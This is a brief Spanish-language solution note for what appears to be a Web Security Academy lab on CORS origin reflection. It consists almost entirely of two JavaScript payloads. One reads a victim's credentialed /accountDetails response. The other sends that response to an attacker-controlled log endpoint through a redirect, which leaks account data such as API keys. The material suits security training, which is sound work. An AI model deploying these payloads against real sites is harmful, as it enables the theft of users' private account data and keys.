1 - CORS vulnerability with basic origin reflection

Para ver la respuesta en mi consola :

<script>
fetch("https://0a5200f003253a4380a9496c00ec0041.web-security-academy.net/accountDetails", {
    method: "GET",
    credentials: "include",
})
.then(response => response.text())  // Obtener el contenido de la respuesta
.then(text => {
    console.log(text);  // Imprimir el contenido en la consola
})
.catch(error => {
    console.error(error);  // Capturar y mostrar errores
});
</script>

Para ver la respuesta en mi servidor:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0a5200f003253a4380a9496c00ec0041.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>